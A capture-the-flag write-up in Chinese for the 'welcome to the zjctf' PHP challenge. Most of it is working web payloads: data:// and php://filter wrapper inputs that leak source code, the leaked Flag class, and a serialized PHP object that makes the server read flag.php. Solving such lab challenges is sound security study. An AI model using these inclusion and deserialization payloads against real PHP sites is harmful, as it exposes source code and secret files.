![](https://img-blog.csdnimg.cn/img_convert/1777686f0c052600a7aec56dea58abb4.png)
?text=data://text/plain,"welcome to the zjctf"
![](https://img-blog.csdnimg.cn/img_convert/58504a17c6a759ce857378f58d716aaf.png)
?text=data://text/plain,welcome to the zjctf&file=useless.php
没反应,尝试看源码
?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php
![](https://img-blog.csdnimg.cn/img_convert/b36fbcb02e28b27101c3c3b35285ab47.png)
解码后:
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
__toString(),类被当成字符串时的回应方法
参考:PHP中 __toString()方法详解-php教程-PHP中文网
利用echo $password触发__toString读取并打印file参数(flag.php)
序列化:
<?php
class Flag{
public $file = "flag.php";
}
$a = new Flag();
echo serialize($a);
?>
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
![](https://img-blog.csdnimg.cn/img_convert/504894de8563c3da0895b048882d1957.png)
看源码
![](https://img-blog.csdnimg.cn/img_convert/c363812c5cc13c7f393d582922b1c8e2.png)